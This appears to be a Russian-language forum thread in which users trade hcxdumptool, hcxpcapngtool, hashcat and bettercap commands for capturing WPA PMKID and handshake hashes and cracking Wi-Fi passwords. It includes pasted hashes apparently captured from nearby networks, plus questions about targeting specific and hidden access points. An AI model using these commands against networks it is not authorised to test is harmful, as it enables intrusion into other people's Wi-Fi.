qazqqqq1
13.11.2024, 09:22
wifislax64 3.4
hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15 Получен файл test.pcapng
Переводим в нужный формат
hcxpcaptool -z test.16800 test.pcapng PMKID*BSSID*MAC клиента*SSID в HEX формате
В wifislax64 3.4 hcxpcaptool новая 6 я версия и команда hcxpcaptool -z test.16800 test.pcapng не работает и PMKID не получить
помогите с правильной командой
174region174
13.11.2024, 09:33
wifislax64 3.4
hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15 Получен файл test.pcapng<br/>
Переводим в нужный формат<br/>
hcxpcaptool -z test.16800 test.pcapng PMKID*BSSID*MAC клиента*SSID в HEX формате<br/>
В wifislax64 3.4 hcxpcaptool новая 6 я версия и команда hcxpcaptool -z test.16800 test.pcapng не работает и PMKID не получить<br/>
помогите с правильной командой<br/>
У меня на kali. https://github.com/ZerBea/hcxdumptool
hcxdumptool -i wlan0 -F -w 'test.pcapng'
hcxpcapngtool -o 1.hc22000 test.pcapng
Ну и после можно запускать брут файла 1.hc22000
hashcat -m 22000
qazqqqq1
13.11.2024, 10:00
Спасибо за быстрый ответ
пробовать буду вечером hcxdumptool -i wlan0 -F -w test.pcapng чтобы получить PMKID*BSSID*MAC клиента*SSID в HEX формате
Wireless Password Recovery использую
qazqqqq1
13.11.2024, 20:45
hcxdumptool -i wlan0 -F -w 'test.pcapng' не работает
hcxpcapngtool -o 1.hc22000 test.pcapng надо другой формат вот такой PMKID*BSSID*MAC клиента*SSID в HEX формате
2 хэша
WPA*02*4476a3befa045e19dc759ee7ce1f8d13*50ff20991e ca*808abd26272a*4861676f726f6d6f47697473756e65*8ed f4a67f2928c8b55db1b3974633960e248ee0e009dc2d4b9a96 9b6f3eb8f5e*0103007502010a00000000000000000001810d fb4e3a3b4997728941515aadc4f7f3a4315f77ddda3ebbba0b 0c8d780a520000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000001630140100000fac040100000fac040100000fac02 0000*02
WPA*02*1b5d6296ed81e709251c4825ccb1f353*68e166866e 78*d0df9a85be33*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c21a3ec4f5a58799e12c4fa3f4 2efca7b429d6fe177c23ce2a5cef5137b42631bf0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10
WPA*01*9aeb082173cb540570f968d57430bd9c*9094e4b163 ae*b0ece1f34f97*506176656c***
WPA*02*a5453d42e4a66585b9b338e69f8e43a7*d8eb97144c 2f*5c78f8c196b2*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c2a66eb86b5d53ec0cd8a5654a 1d96752de9c58023c512157c4e499098d04e1b2e0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10
174region174
13.11.2024, 21:14
hcxdumptool -i wlan0 -F -w 'test.pcapng' не работает
hcxpcapngtool -o 1.hc22000 test.pcapng надо другой формат вот такой PMKID*BSSID*MAC клиента*SSID в HEX формате
2 хэша
WPA*02*4476a3befa045e19dc759ee7ce1f8d13*50ff20991e ca*808abd26272a*4861676f726f6d6f47697473756e65*8ed f4a67f2928c8b55db1b3974633960e248ee0e009dc2d4b9a96 9b6f3eb8f5e*0103007502010a00000000000000000001810d fb4e3a3b4997728941515aadc4f7f3a4315f77ddda3ebbba0b 0c8d780a520000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000001630140100000fac040100000fac040100000fac02 0000*02
WPA*02*1b5d6296ed81e709251c4825ccb1f353*68e166866e 78*d0df9a85be33*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c21a3ec4f5a58799e12c4fa3f4 2efca7b429d6fe177c23ce2a5cef5137b42631bf0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10
WPA*01*9aeb082173cb540570f968d57430bd9c*9094e4b163 ae*b0ece1f34f97*506176656c***
WPA*02*a5453d42e4a66585b9b338e69f8e43a7*d8eb97144c 2f*5c78f8c196b2*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c2a66eb86b5d53ec0cd8a5654a 1d96752de9c58023c512157c4e499098d04e1b2e0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10
То что ты предлагаешь это старый формат.
В нём уже ни кто не ищет. Эти хеши которые ты получил актуальны на данный момент. либо можешь сразу искать из файла .pcapng
В программе WPR без какого либо конвертирования.
Единственный хеш который ты можешь у себя запустить удалив из него лишнее вот этот
9aeb082173cb540570f968d57430bd9c*9094e4b163ae*b0ec e1f34f97*506176656c
qazqqqq1
14.11.2024, 08:38
Если hcxdumptool атаковать конкретную точку доступа или выбранные какая команда подскажи
libvernow
14.11.2024, 21:24
hcxdumptoo
зачем ты себе голову морочишь, в wifislax есть программа bettercap, она хорошо захватывает PMKID и сразу же сохраняет в универсальном формате .pcap
что тебе ещё нужно?
qazqqqq1
15.11.2024, 06:27
Спасибо за совет буду пробовать bettercap, но и hcxdumptool ловит PMKID надо найти лидера!
hcxdumptool v4.2.0 модули старые какой программой сделать новые для wifislax расширение .xzm
скрытые сети чем открыть и словить PMKID? Airodump-ng не помог
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot